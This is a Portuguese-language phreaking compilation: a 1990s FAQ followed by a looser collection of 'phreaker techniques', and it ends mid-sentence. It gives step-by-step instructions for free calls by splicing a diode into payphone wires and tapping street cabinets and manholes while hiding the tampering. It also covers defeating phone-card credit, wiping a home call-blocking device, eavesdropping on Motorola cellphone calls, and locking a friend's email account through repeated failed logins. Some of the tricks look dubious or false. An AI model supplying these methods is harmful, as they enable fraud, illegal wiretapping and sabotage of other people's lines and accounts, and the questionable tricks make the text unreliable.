Ao me deparar com alguns textos do gênero, sentia-me decepcionado
ao perceber que eram incompletos e fracos, quando o assunto em
questão era a telefonia.

É triste também perceber que pessoas mal informadas e sem
conhecimento técnico (embora tenham boa vontade), assinam estes
textos. Faço aqui um tutorial com material bastante útil, que explica
muitas coisas que podem ser feitas com a intenção de buscar um
pouco de liberdade para se utilizar os sistemas telefônicos.
Este texto também é destinado àqueles que se rasgam de ler textos
americanos de phreaking e boxing. Não importa o que fulano ouviu
dizer que dava o sistema telefônico nacional é completamente
diferente do usado nos E.U.A. e não permite o "boxing". Ver maiores
detalhes na seção 5.

1.3 - Conceitos básicos a respeito de telefonia
Ao contrário do que muita gente pensa, os fios da linha telefônica
possuem uma tensão contínua equivalente a -48 volts. Esta tensão se
altera para um valor alternado de 96 volts quando o telefone toca.
Portanto, ao lidar com os fios do telefone, tenha o cuidado de não
encostar no orelhão, na parede, ou em qualquer coisa que possa
"aterrá-lo". Este cuidado deve ser redobrado se o telefone for
comunitário ou residencial. Levemos também em consideração que se
o aparelho possuí uma tensão contínua, significa que ele tem também
uma polarização correta (fio positivo e fio negativo). Na instalação do
aparelho esta polarização não faz diferença, mas quando o assunto é
violação, ela deve ser observada.

Vamos lembrar também que existem dois tipos de linhas telefônicas:

A) Decádicas (ou Pulse) - são as linhas dos prefixos mais antigos do
sistema telefônico. A identificação de chamadas se dá através de uma
série de sinais (pulsos), que são interpretados pela central telefônica.

B) Multifrequenciais (ou Tone) - são as linhas dos prefixos mais novos
onde trabalham o serviço de CPA (Central telefônica com controle por
Programa Armazenado). A identificação de chamadas se dá através
da decodificação de tons frequenciais em números.


--------------------------------------------------------------------------------

Seção 2 - Telefones privados

--------------------------------------------------------------------------------

2.1 - Introdução
Nesta seção, explicarei o processo (bem simples) de se efetuar
ligações a partir de telefones sem teclas ou com cadeado, muito
comuns em empresas e ambientes de trabalho.

2.2 - Efetuando ligações de aparelhos sem teclas
Antes de começarmos, precisamos definir o que significa "duração de
um pulso". Um pulso é simplesmente uma interrupção no fluxo de
corrente que circula na linha telefônica, e a sua duração é entendida
como o espaço de tempo decorrido do início ao fim desta interrupção.

Os pulsos enviados pelo aparelho telefônico quando você aperta o
botão de algum número, são iguais ao sinal emitido quando você
coloca o telefone no gancho. A diferenciação é feita pela central
telefônica, usando como referência a duração do pulso. Se ele for um
pouco maior do que 0.5 segundos (aumentar um pouco esse valor
para as linhas mais antigas), a central considera que é um pedido de
linha. Se a duração do pulso for menor do que esse valor, a central irá
considerar que um número a ser discado está sendo enviado.

Para formar os números de 0 a 9, são enviado uma série de pequenos
pulsos em seqüência referentes ao número, ou seja, 2 pulsos para o
número 2, 3 para o número 3 e assim por diante. Para o número 0 são
enviados dez pulsos.

Para simular esses pulsos sem a necessidade de teclas, basta usar o
botão onde se "pega" a linha, aquele onde você coloca o telefone em
cima quando quer terminar uma ligação. Aperte e solte este botão
rapidamente de acordo com o número que você quer discar, espere
um pouco e aperte outra série de vezes de acordo com o outro
número. Lembre-se que para o número 0 deve-se apertar o botão dez
vezes.

Faça isso com todos os números e, ao final, você escutará o tom de
chamada.


--------------------------------------------------------------------------------

Seção 3 - Telefones públicos

--------------------------------------------------------------------------------
3.1 - Introdução
Nesta seção explicaremos alguns métodos de efetuar ligações com
telefones públicos sem a necessidade de se gastar fichas.
Mostraremos também como ligar notebooks a telefones públicos (se é
que existe um hacker que não saiba...).

3.2 - Efetuando ligações gratuitamente utilizando um diodo
O diodo é um componente eletrônico que possui diversas utilizações.
Podemos resumir seu funcionamento basicamente na seguinte
síntese:

Um diodo (ou junção PN), permite que a corrente circule em apenas
uma direção dentro de um circuito.
Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente
em qualquer casa de componentes eletrônicos. Vamos precisar
também de um resistor com valor nominal de 22K e potência de 1W.

Basta que você ligue o diodo em paralelo com o resistor (conforme
tenta mostrar a ilustração abaixo) e, em seguida, descasque os fios do
telefone e ligue cada uma das pontas obtidas com o diodo e o resistor
neles.

Lembre-se: você vai apenas descascar os fios do orelhão!!! Se você
cortá-los, ele vai ficar sem linha.


||

|| fio do telefone

||

||

+------------------++-------------------+

||
||

| +----¦¦¦¦¦¦¦----+ |

| / diodo \ |

ponta +_--------+ +--------_+ ponta

|\/|

| +----¦¦¦¦¦¦¦----+ |

| resistor |

||

+------------------++-------------------+

||

|| fio do telefone

||

||




Para executar esta tarefa, eu aconselho que você descasque os fios
dos orelhões que você utiliza com mais freqüência pois, devido ao fato
dos fios do telefone público serem muito grossos, não é um trabalho
que se possa fazer tranqüila e rapidamente sem ser notado.

Você deverá observar também a polarização correta a ser utilizada.
Você perceberá isso facilmente pois, quando você ligar o diodo de
maneira errada, o orelhão vai ficar sem linha.
Uma dica pessoal: os telefones de cabine e os de cartão são mais
fáceis de serem violados. Alguns orelhões comuns tem uma proteção
blindada que impedem o acesso ao cabo telefônico. Embora mesmo
assim seja possível puxar o fio com um gancho, que você enfiará do
lado esquerdo do aparelho telefônico, entre o telefone e uma grade
preta de sustentação que fica atrás dele, eu aconselho que você evite
esses tipos.

Vamos voltar um pouco para a parte técnica da coisa.

O diodo que estamos utilizando vai funcionar da seguinte maneira:

Quando uma ligação é completada de um telefone público, a central
inverte a polarização do telefone de -48 para 48 volts. Quando o
aparelho telefônico percebe isso, ele pede uma fixa. É aí que entra em
funcionamento o nosso querido diodo. Ele permite que a tensão caia
até 0 volts, mas não permite que ela se torne positiva. Dessa forma o
orelhão não vai pedir a ficha.

Nesse caso o resistor está funcionando apenas como um dissipador
de potência, para que você não dê o azar de queimar o diodo (não que
ele seja caro, é que em algumas localidades ele pode ser uma peça
rara que custa R$0,10) e ficar sem telefonar. Mesmo se você não
achar nenhuma loja que venda, pegue uma placa antiga de alguma
coisa que tenha queimado. Elas sempre tem diodos.

Você deve procurar uma peça pequenininha que tem dois terminais, é
preta e normalmente estará escrito IN qualquer coisa.

3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum
Primeiro, você deve tomar os processos citados anteriormente para
descascar os fios do telefone. Em seguida você deve conseguir um
aparelho telefônico comum e ligar cada uma das pontas dos fios dele
nos fios do orelhão.

Para facilitar a sua vida, eu aconselho que o seu telefone seja o menor
possível e que você prenda um jacaré (pequeno gancho achado em
qualquer loja de componentes eletrônicos) em cada uma das pontas
do seu telefone, para facilitar a ligação no orelhão.
Aí é só efetuar a ligação normalmente.

3.4 - Conectando notebooks a telefones públicos
O processo para se conectar notebooks a orelhões, é igual ao de se
conectar telefones comuns. Resumirei nesse item, algumas
considerações a respeito da fiação do notebook, que segue os
padrões da FCC Americana e é um pouco diferente da nossa.

O conector do fio do notebook, que é do tipo jack, tem quatro fios
dentro dele. Arranque o conector de plástico transparente que fica na
ponta do fio, pegue os dois fios centrais e separe-os dos fios das
extremidades.

Estes dois fios centrais, são os que serão utilizados para fazer a
ligação no orelhão. Eu aconselho que você coloque jacarés neles
também.

Basta conectar-se a BBS's da mesma forma que você se conecta em
casa.

Caso você queira testar se está tudo OK, abra um programa de
terminal qualquer e digite o comando ATA, se fizer um barulhinho
parecido com o tom de linha é que está tudo OK.

3.5 - Observação
As chamadas telefônicas se dividem em três categorias: locais, DDD
regionais e interurbanas (ou nacionais).

As chamadas locais são aquelas efetuadas dentro de sua cidade, as
DDD regionais são as ligações feitas dentro do complexo urbano onde
você mora, no caso de São Paulo, as chamadas DDD regionais são
aquelas feitas para as cidades que fazem parte da Grande São Paulo:
Jundiaí, Santo André, São Bernardo, etc. As chamadas interurbanas
são aquelas feitas para fora do complexo urbano onde você está
localizado. Usando São Paulo como exemplo, podemos citar o interior
do estado de São Paulo e cidades localizadas em outros estados.

Os telefones comuns efetuam chamadas locais e DDD regionais, e os
telefones DDD efetuam chamadas interurbanas, ou seja, para
qualquer lugar do Brasil.
--------------------------------------------------------------------------------

Seção 4 - Caixas de verificação

--------------------------------------------------------------------------------

4.1 - Introdução
As caixas de verificação (ou armários na linguagem "técnica" da
TELESP) são caixas de ferro, que geralmente ficam localizadas em
vias públicas, e são utilizadas para se fazer a checagem das linhas do
sistema e identificar problemas antes de se enfiar no subsolo para
tentar resolvê-los.

Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura,
com um código em preto escrito na parte superior.

Elas possuem um grande número de fios telefônicos, todos eles
divididos em pares. Tais caixas podem ser facilmente abertas (se é
que a que você achar já não estiver arrombada), pois geralmente
possuem uma tranca padrão em forma de triângulo que qualquer
chaveiro conhecido pode fazer. Lembre-se que você é um hacker, não
um vândalo. Não vá arrombar a porra da caixa. Isto é coisa pra quem
não tem cérebro. Mesmo se ela estiver trancada com um cadeado. Se
não puder abrir um cadeado ou procurar informação de um método
para abrí-lo, procure outra caixa. Ou então esqueça que você leu esta
seção.


4.2 - Efetuando ligações gratuitas de caixas de verificação
Para se efetuar uma ligação de dentro destas caixas, basta que você
pegue um dos diversos pares de fios que se encontram lá dentro e
ligue eles ao seu pequeno telefone comum portátil ou a um notebook.
Não esqueça de por os fios que você tirou de volta no lugar para que,
nem o pessoal da manutenção e nem o dono da linha, percebam.

Como essas caixas de verificação costumam se situar em vias bem
movimentadas, a prática desse tipo de ligação é desaconselhada.
Mas, como toda a regra tem sua exceção, fica aqui mais uma
informação para você.

Vale lembrar que de caixas de verificação, pode-se efetuar
telefonemas para qualquer lugar, inclusive chamadas internacionais.


--------------------------------------------------------------------------------

Seção 5 - Pequena FAQ sobre telefonia

--------------------------------------------------------------------------------

5.1 - É possível tomar um choque mexendo em fios telefônicos?
Como descrito no item 1.3, os fios telefônicos possuem uma tensão
suficiente para dar choque relativamente forte em uma pessoa. Este
valor de tensão pode atingir um patamar em que ele pode dar um
verdadeiro coice na pessoa, no momento em que a linha envia o sinal
para o telefone tocar.

Isto depende muito da situação e da pessoa. Se você estiver com a
mão no orelhão e mexer nos fios, você provavelmente vai tomar um
choque legal. Se você tiver acabado de comer algo salgado,
provavelmente este choque será ainda mais forte, pois o sal aumenta
a condutividade do seu corpo.


5.2 - Como faço para fazer chamadas grátis de minha residência?
Quando você efetua uma chamada, a central telefônica identifica de
onde você está discando, identifica qual o tipo de telefone que você
está usando (público ou residencial), e então ela arquiva pra onde está
senda feita a ligação e toma as providências necessárias com relação
a cobrança.

Essa identificação é feita na fonte e não por um sinal enviado pelo seu
telefone. Desse modo, é praticamente impossível pra você que está na
sua residência, tentar driblar essa tarifação. Imagine que sua linha
telefônica não passa de um ramal de PABX.


5.3 - O que é o BINA?
O BINA, é um sistema de identificação de chamadas desenvolvido
com tecnologia nacional, que permite a quem está recebendo a
chamada, visualizar o número do telefone de quem está telefonando
para ele.

O esquema teve que ser desenvolvido aqui no Brasil, pois o sistema
telefônico é tão arcaico, que não existiam pacotes prontos para se
adquirir. É como você tentar comprar um Kit Multimídia para um TK-85
ou um MSX.

Tal sistema só funciona em linhas Decádicas, portanto, se você quiser
passar um trote para alguém, procure se certificar qual o tipo de linha
que ela possui. Para isso, basta você dar uma olhada no prefixo e ligar
para a sua companhia telefônica local perguntando se ele suporta
CPA. Se eles falarem que sim, então pode ficar tranqüilo e efetuar a
ligação que você não corre o risco de ser descoberto.

Mas tome cuidado com o que você vai fazer pois, sob ordem judicial,
as companhias locais podem fornecer um rastreamento de chamadas
e assim descobrir de onde você telefonou.


5.4 - Existe alguma maneira de se bloquear o BINA?
Da mesma maneira que a tarifação, o BINA não pode ser driblado do
telefone que você está efetuando a chamada. Quem fornece o número
que vai aparecer no aparelho do receptor, é enviado pela central
telefônica e não pelo seu telefone.

Vale que acrescentar que o sistema não funciona perfeitamente bem e
que às vezes não consegue identificar determinada chamada. Ele
também não identifica chamadas de telefones públicos.


5.5 - As famosas "boxes" funcionam aqui no Brasil?
Como se pode notar nesta seção, o sistema telefônica nacional,
trabalha de maneira centralizada ao contrário do americano que
trabalha de forma distribuída. E não é por acaso, pois, além de
possuírem um número bem maior de linhas telefônicas, os serviços lá
são privatizados e diversas companhias oferecem linhas telefônicas.
A tarifação se dá por diversas identificações enviadas pelos telefones
e diversas centrais distribuídas pelo país. O que os "boxes" fazem, e
driblar esses sinais enviando outros de diversas frequências
diferentes.

Por exemplo, você faz uma chamada internacional mas usa uma "box"
para enviar um sinal para a central de como esta chamada fosse uma
chamada local.

Já de telefones públicos (quem já foi pra lá sabe disso), depois que
você efetua uma chamada, aparece novamente um tom de linha que
fica aguardando o sinal do orelhão que diz que você pagou
determinada taxa para o determinado serviço. Neste caso os "boxes"
enviam os sinais no lugar do orelhão e a chamada é completada.
Esses tipos são conhecidos como Red Boxes, mas não funcionam em
todos os telefones públicos.

Se bem que, ultimamente, as centrais telefônicas estão sendo
substituídas por modelos mais novos. Isto ocorre principalmente em
São Paulo. Mas caso elas permitam o "boxing", isto será um assunto
para um próxima versão desta FAQ.


--------------------------------------------------------------------------------

Seção 6 - O autor

--------------------------------------------------------------------------------

6.1 - Agradecimentos

Agradeço a todas aquelas pessoas que escreveram textos ruins sobre
violação de telefones e me estimularam a fazer um trabalho melhor
elaborado.

Espero em breve poder escrever uma FAQ sobre telefonia celular,
detalhando processos de escuta telefônica e mais algumas coisas.

Obrigado ao pessoal do Brazilian Hackers Club, que mandaram
perguntas que foram adicionadas à Seção 5. Suas perguntas
ajudaram também a completar algumas seções.

Hackers do Brasil, uni-vos contra o preconceito e contra o vandalismo
eletrônico.

Agradeço também a todos aqueles que contribuem para que haja uma
maior liberdade de expressão em todos os meios de comunicação, em
especial, a nossa querida NET.

Saudações também a todos aqueles que lutam por condições
melhores de vida. Quem sabe um dia possamos viver em um mundo
mais justo e com menos desigualdades sociais.

Morte ao pensamento neoliberal.


"Lutamos por um mundo melhor. Um mundo onde você possa ser feliz
sem que isso implique na infelicidade do seu próximo"


Marcos - Líder do Exército Zapatista de Libertação Nacional


6.2 - PGP Key


Tipo Bits/IDChave Data Usuário (IDU)

pub 1024/11E9A405 1996/12/21 Tom Waits <tom.waits@usa.net>



-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: 2.6.3ia



mQCNAzK7UwMAAAEEANQz27W9JQUVDYLxEGVX8l0An1tYLbbLX
wEg6xBc9Y6/dcAa
bn+Z5RbT5PrkySCVaLgePIfCKCzAEAkbAyCES7X2YNoHDD6Ea4AQ
n7TDWbP0Wprw

xbJErRuuE1G+WquDa/nPSmsrZw+h29Ec3AR/G3/WW/95FD8yybLjR4
gR6aQFAAUR

tB1Ub20gV2FpdHMgPHRvbS53YWl0c0B1c2EubmV0PokAlQMFEDK7
UwOy40eIEemk

BQEByRIEAKPvqZAEEk6oyZXyfs82gc/Lt4cBNonFm1CBph4w/JqX7Q
kkSibD7PUW

ewsTxht6ESsJbDWsT0st7bU9UfLJFqfeOMq5NH4q8gpJQFFG9IBUx/
PrZxeOAwpa

SWIfUGt/cfOHn0gurh1AgktS5NyXOeRL5QDw0x3O/XKNY/Pv03KV

=+Fdu

-----END PGP PUBLIC KEY BLOCK-----




6.3 - Como contatar o autor

Para esclarecimentos ou correções, mande-me um e-mail ou procure-
me no Brazilian Hackers Club. Uma associação mantida da livre
iniciativa de um cara muito dedicado que atende por Liquid Byte.

Terei prazer em responder a perguntas inteligentes, não sou fresco
como alguns membros da comunidade...

Dependendo do que você for perguntar, isto é, coisas
comprometedoras, use o PGP. Tenha bom senso. Se você fizer
perguntas idiotas, receberá respostas cretinas.
e-mail: tom.waits@usa.net

LiquidByte home-page (Brazilian Hackers Club)

http://www.geocities.com/SiliconValley/Heights/6152/


Free Speech!!!

Rage Against The Machine.

---

TÉCNICAS PHREAKERS

JUNTEI AQUI AS MELHORES TÉCNICAS PHREAKERS, QUE
EXISTE COM DICAS PRA FICAR AINDA MELHOR!!!
Ligando de telefones sem tecla ou que tem cadeado
Bom vcs ja devem ter ouvido falar de pessoas que ligaram pelo botao
de desligar, ou de dar linha aquele onde vc poe o gancho por cima.
Porra se deve ter entendido.
Bom muito facil tbm, so nao dou certeza de que va funcionar porque o
telefone não pode ser muito novo...tem que ser um modelo um pouco
mais
antigo, bom no meu que é um modelo de 89 funcionou se o seu é por
ai
deve funcionar normalmente!
-.- DIRETO AO ASSUNTO -.-

1- Faca a ligacao com o numero desejado!
ex: 555-6766

- para discar o 5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
5 ( aperte cinco vezes aquele botao )
6 ( aperte seis vezes aquele botao )
7 ( aperte sete vezes aquele botao)
6 ( aperte seis vezes aquele botao )
6 ( aperte seis vezes aquele botao )
Voce deve estar se perguntando, mas se tiver um zero como eu faco?
p:-Nao aperto nada?
r:-Nao porra, aperte dez vezes aquele botao!

Obx: Tem que ter um intervalo de 1 a 2 segundos entre os apertos!
Obx2: "aquele botao" é o botao do gancho, onde voce desliga!



Ligando de telefone publico sem pagar!
Este metodo so funciona em telefones antigos! Aqueles na base da
fichinha
ou da moedinha ( se estiver nos Eua, usa o Rex Box ).
Por exemplo:
O numero que vc quer ligar e' 823-26-47 ( numero ficticio )

Primeiro vc deve dimunuir de 10 todos os numeros que compoem o
telefone
a se ser discado, no caso esse telefone ficaria.

Numero a ser discado: 823-26-47

ORIGINAL_______
|
(8-10)=2
(2-10)=8
(3-10)=7
(2-10)=8
(6-10)=4
(4-10)=6
(7-10)=3
|_______ NOVO NUMERO


O novo numero sera: 287-84-63

O que vc vai ter que fazer e' bater no bocal do telefone o numero de
ve-
zes correspondente a subtracao.
Bata 2 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 7 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 4 vezes no bocal ( intervalo de 2 segundos )
Bata 6 vezes no bocal ( intervalo de 2 segundos )
Bata 3 vezes no bocal ( intervalo de 2 segundos )

Desta maneira vc podera fazer ligacoes gratuitamente...
Quando estiver agil podera ligar mais rapido, ai fica facil!




Ligando de telefone celular sem pagar
Bom, esse metodo foi observado por mim e foi confirmado por muitos
amigos. Mas de um tempo pra cá a CRT ou telemerda. Mudaram o
sistema e
talvez nao funcionara, mas tente!!!!
Voce tem que ligar para um numero normal, vamos pegar o exemplo
de um
numero de celular.

Ex: 928-13-47

Olha, nem sei se este numero existe e se existe nao conheco o dono
do
numero, nao vao ligar pra ele e pedir informacoes! ;))
Entao devemos pegar o ultimo numero do telefone a ser discado, no
caso
o 7... subtraimos ele de 10, o que vai resultar o numero 3.
Somente vamos acrescentar o numero 3 ao final do numero discado.
O resultado vai ficar:

Numero ligado sem pagar: 928-13-47-3

Heheheheh! Itz so eazy
Nao teste isso como um louco, faca um ou duas ligacoes que
realmente
sejam significantes no valor e espera a conta telefonica.
Obs. Nao conte isso pra ninguem! heheheheh ;)



Phucking block line
Essa tecnica e' meio forcada, mas funciona.
Nosso alvo sao aqueles aparelho que bloqueiam chamadas
telefonicas o
tao temido BLOCK LINE.
Bem isso e'soh uma parte pq ja estamos imaginando uma materia
futura so-
bre o sistema mas o englobando de forma muito melhor e falando
mais dos
detalhes tecnicos. Por enquanto espero isso quebre o galho...
Primeira coisa que vcs devem fazer e' descobrir se o problema e'
realmen-
te o BLOCK LINE e se a linha nao foi bloqueada na companhia
telefonica.
Antes de tudo olhe se a senha padrao que e' 222 nao foi mudada.
Agora procuro o telefone principal da casa, aquele que quando
desligado
desliga a todos da casa.
Acho? Beleza, abra ele com uma chave de fenda e procure uma
caixinha pre-
ta escrita block line.
Abra agora tb o block line, com cuidado pra nao quebrar. Apos ter feito
isso tire a pelicula que cobre a placa do aparelho block line e exponha
o circuito a luz fluorescente ( raios ultra-violeta). Pronto, vc apagou
todas informacoes da placa...
Agora e' claro que os pessoas nem vao desconfiar qual o problema ;)

Como ligar gratuitamente em orelhoes a cartao
Ponha o cartao e ligue normalmente
Quando a pessoa atender aperte o 0(zero) e segure.
Pronto agora suas fichas (unidades do cartao) nao vao cair mais!
Obx: Nao solte o dedo do 0(zero) se nao as fichas vao voltar a cair,
essa e a parte chata!
Algumas dicas pra fazer cartoes que realmente funcionam
Ok, os cartoes desse tipo de orelhao, funcionam da seguinte forma:
Eles sao formados por minusculos microfusiveis queimados por
indutancia,
assim, quando vc insere o cartao no orelhao, atraves de um "sensor",
ele
verefica quantos microfusiveis ainda estao "ligados". Quando vc
conhece
algo, vc pode engana-lo, entao, um metodo q tem funcionado por
quase to-
do brasil, eh o de vc pegar o seu cartao, e fuça-lo todo.
As dicas que funcionam:
Esmalte:
Pegar um cartao telefonico comum e passar um esmalte incolor ( base
) na
tarja do cartao. Parece que esta base impede o cartao de "queimar" os
creditos, o mesmo pode ser tentado em cartao de fliperama.
Pinte a tarja de maneira que fique fina para impedir que o cartao fique
grosso demais e nao passe na maquina.


Papel Aluminio

E' soh pegar um pedaco de papel aluminio e enrolar no cartao, pode
usar a
vontade...


Silicone

Este é o metodo mas facil e comprovado por mim. pegue aquela
silicone
(transparente) e passa bem fina (fina mesmo) camada de silicone por
cima e
deixa secar mais tarde vc vera um cartão que funciona infinitivamente


Cartoes Infinitos

Atençao: esta dica tem que ser realizada com muita paciencia pois se
vc errar
uma coisa estraga tudo!!
Primeiramente consiga um estupido cartao telefonico zerado !
Lixe ele com aquela lixa bem fina e deixe-o em repouso durante 3 ou 4
minutos.
Passado entao cerca de 3 a 4 minutos percebera que a tinta do cartao
nas costas da figura saiu... quando a tinta nas costas
da figura ja estiver totalmente desaparecida voce percebera como a
confeccao do cartao e' uma merda.
É um negócio tipo assim:

costas do cartão
-----------------
| o-o o-o o-o | Em cada bolinha ligada por um fio que nem diz o
desenho ( o-o )
| o-o o-o o-o | coloque um papel laminado bem fino para interligar as
duas bolinhas.
| o-o o-o o-o | Ou tambem da pra usar fio bem fino.
| o-o o-o o-o |
| o-o o-o o-o |
-----------------

_____ _____
/\/\
/\/\
| bolinha 1 | ============ | bolinha 1 | Obs: Ficou Orrivel
\/\/
\ _____ / \ _____ /



cubra da bolinha 1 até a 2 com o nosso amigo papel laminado ou fio
fino




Efetuando ligacoens gratuitas de um telefone publico utilizando um
diodo
O diodo e um componente eletronico que possui diversas utilizaçoens.
Podemos resumir seu funcionamento basicamente na seguinte
sintese:
Um diodo (ou jun‡aum PN), permite que a corrente circule em apenas
uma
direçaum dentro de um circuito.
Ao se utiliza-lo para o fim aqui desejado, vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente
em
qualquer casa de componentes eletronicos. Vamos precisar tambem
de um
resistor com valor nominal de 22K e potência de 1W.

Maums a obra !

Basta que voce ligue o diodo em paralelo com o resistor (conforme
tenta
mostrar a ilustraçaum abaixo) e em seguida, descasque os fios do
telefone
e ligue cada uma das pontas obtidas com o diodo e o resistor neles.
Lembre-se: voce vai apenas descascar os fios do orelhaum !!! Se voce
corta-los, ele vai ficar sem linha.

||Fio do telefone
||
+-------------------++------------------+
||
| + {{{{{{{{{}}}}}}}}}}} - |
| /diodo\ |
+=============+ +==========+
| \resistor/ |
| + |||||||||||||||||||| + |
||
||
+-------------------++------------------+
||
||

Para executar esta tarefa, eu aconselho que voce descasque os fios
dos
orelhoens que voce utiliza com mais frequencia pois, devido ao fato
dos
fios do telefone publico serem muito grossos, naum e um trabalho que
se
possa fazer tranquilo e rapidamente sem ser notado. Voce dever
observar
tambem a polarizaçaum correta a ser utilizada. Voce pode perceber
isso
facilmente pois, quando voce ligar o diodo de maneira errada, o
orelhaum
vai ficar sem linha.
Uma dica pessoal: os telefones de cabine e os de caraum saum mais
faceis de serem violados. Alguns orelhoens comuns tem uma
proteçaum
blindada que impedem o acesso ao cabo telefonico. Embora mesmo
assim
seja possível puxar o fio com um gancho, que voce deve enfiar do lado
esquerdo do aparelho telefonico, entre o telefone e uma grade preta
de
sustentaçaum que fica atras dele, eu aconselho que voce evite esses
tipos.
Vamos voltar um pouco para a parte tecnica da coisa.
O diodo que estamos utilizando vai funcionar da seguinte maneira:
Quando uma ligaçaum e completada de um telefone publico, a central
inverte a polarizaçaum do telefone de -48 para 48 volts. Quando o
aparelho telefonico percebe isso, ele pede uma fixa (ou uma unidade).

Ai e que entra em funcionamento o nosso querido diodo.
Ele permite que a tensaum caia ate 0 volts, mas naum permite que ela
se
torne positiva. Dessa forma o orelhaum não vai pedir a ficha (ou
unidade
de cartão).
Nesse caso o resistor esta funcionando apenas como um dissipador
de
potencia, para que voce naum de o azar de queimar o diodo (naum
que ele
seja karo, e que em algumas localidades ele pode ser uma peça rara
que
custa R$0,15) e ficar sem telefonar. Mesmo se voce naum achar
nenhuma
loja que venda, pegue uma placa antiga de alguma coisa que tenha
queimado.
Elas sempre tem diodos. Voce deve procurar uma peça pequinininha
que
tem dois terminais, e preta e normalmente vai estar escrito IN.



Efetuando ligaçoes com seu pequeno telefone em um orelhão

Essa técnica foi muito usada aqui na minha city por mim e por amigos.
Vc deve de madrugada (de preferencia) chegar no orelhào e colocar a
mao
la tras, vc vera que tem um fio duplo soh. com muito cuidado puxeo
para o
lado e descasque os dois fios!! pronto agora é soh chegar ali e
conectar seu
pequeno telefone aos fios do orelhão e pronto. Vc tem uma linha que
vc so
pode ligar pra DEI, DEI, DEI (DDD) porque orelhão tem bloqueio de
ligação
internacional.
Dica: compre um telefone em lojas de consertos eleronicos bem
pequenos e
antigos que tem um formato de um celular.
Dica2: o que so pode fazer é conectar um notebook e navegar
normalmente com
uma conta de um lammer.



Efetuando ligaçoes dos tampoes do meio da rua

Naum sei se vc ja notou, aquelas tampas que existe no meio da rua.
Escrito tipo" telefone" na minha city ta cheio, se na tua nao tem te
fode. Um dia (de preferencia de madrugada) levanta aquilo, pedi pra
alguem ajuda porque é pesado. Vai te um monte de barata mas
manda elas toma no cu. Vc vai ver um fio se ele tiver descascado
Otimo!! tira a isolante e usa. Mas se ele nao tiver descascado vc vai
ter que fazer isso. Agora pega o seu fone e conecta naquele fio vc vai
pode fazer ligaçao (ddd, ddi, pros quintos dos infernos pra onde tu
quiser) Foda-se o babaca que pagar isso.
Dica: Quando vc fechar a tampa deixa a parte do fio que vc descascou
pra fora aí a outra vez que vc ir lá vc nao precisa levantar aquela
porra.


Efetuando ligaçoens gratuitas de caixas de verificaçaum
(caixas da CRT OU TELEMERDA):

Para se efetuar uma ligaçaum de dentro destas caixas, basta que voce
pegue um dos diversos pares de fios que se encontram la dentro e
ligue
eles ao seu pequeno telefone comum portatil ou a um notebook. Naum
esqueça de por os fios que voce tirou de volta no lugar para que, nem
o
pessoal da manutençaum e nem o dono da linha, percebam. Como
essas
caixas de verificaçaun costumam se situar em vias bem
movimentadas, a
pratica desse tipo de ligaçaum e desaconselhada. Mas, como toda a
regra
tem sua exceçam, fica aqui mais uma informaçaum para voce. Vale
lembrar
que de caixas de verificaçaum, pode-se efetuar telefonemas para
qualquer
lugar, inclusive chamadas internacionais pois saum linhas comuns de
telefones!

Dica:As caixas de vericaçaum sao aquelas caixas cinzas que tem em
todos
bairros. Se vc encontrar uma aberta. Phreak até nao poder mais e
depois
coloque um cadeado seu lá para os babacas da telemerda nao
descobrirem
que mexerem pois nao terão como abrir.
O autor da hp nao tem nada a ver com estes textos entaum se
pegarem vc te fode.



Motorolla

ESSE É UM TEXTO EXPLICATIVO DE COMO ESCUTAR
CONVERSAS DE TELEFONE
CELULAR MOTOROLA (TODOS OS MODELOS MENOS NO ELITE)
Fazendo Escutas com o PT 550 da Motorola

O sistema de telefonia celular e' altamente vulneravel ao phreaking. E'
simples se
fazer escutas telefonicas, e outras coisas como: clonagem de
telefones para se
efetuar ligacoes gratuitas, etc. Se voce duvida, pegue um celular como
o famoso e
numeroso PT-550 da motorola. Tire a bateria do celular e note que ha'
tres
encaixes metalicos atras do aparelho. Coloque um pedaco de papel
laminado no
encaixe do meio e recoloque a bateria. Lique o telefone (ele esta
agora no modo de
programacao) e digite:

# 08 # 11 XXXX #

Onde:

#08 Liga o audio de RX (Receptor) #11 Ajusta canal de funcionamento
do
transreceptor XXXX numero do canal (aconselho a voce tentar
numeros abaixo de
800)

Exemplo:

#08#11567#
Tente varias vezes ate encontrar um canal onde haja conversa.
Percebeu? Voce
esta fazendo uma escuta em um telefone celular. Nao requer pratica
nem tao
pouco habilidade. Vale lembrar que se algum policial te pegar voce
pode ir em
cana. Ha tambem maneiras de se fazer clonagem, isto e, fazer o seu
telefone
celular usar a linha de outra pessoa. Eu particularmente nunca tentei
mas, se voce
quiser por sua pele a risco, procure pelo Motorola Bible, ou outros
tantos textos
existentes por ai. Falando de maneira simples, um celular e' um radio-
transmissor
que trabalha com frequencias na faixa de 800 MHz, e que e' capaz de
alternar
entre canais ao receber comandos de um computador conhecido
como Central
Switch, que controla o sistema telefonico movel. Pode-se dizer que um
aparelho
celular e' dividido em duas partes: O Transceiver
(Transmissor/Receptor) e a
cabeca de comando. Entende-se por cabeca de comando o teclado e
seu circuitos
de comandos, a NAM e a ESN. A NAM e' um chip de PROM
(Programable Read
Only Memory) que contem informacoes sobre o funcionamento do
celular, como
numero, area, etc. Ja a ESN (Eletronic Serial Number) e' um chip de
ROM (Read
Only Memory) que armazena um numero geralmente de 11 digitos
octais,
referentes a um numero de serie unico para cada telefone. Existem
alguns modelos
de celulares que tem as suas NAM's reprogramaveis pelo proprio
teclado do
celular. Outros necessitam que se ligue o celular a computadores.
COMO BLOQUEAR UM E-MAIL DE SEU AMIGO NO BOL !!!
_______________________________________________



E simples, entre no site da Bol: www.bol.com.br , quando estiver no site ira
aparecer para digitar o "LOGIN" e a "SENHA". No lugar do "LOGIN" digite o
E-mail do seu amigo, Ex: ricardo, e na "SENHA" digite ( BOLBLOCPASS ), mas sem
as arpas. Pronto fique apertando o "ENTER" do seu teclado rapidamente, vai
aparecer senha ou login invalidos, mas isso não e nada, continue pressionando
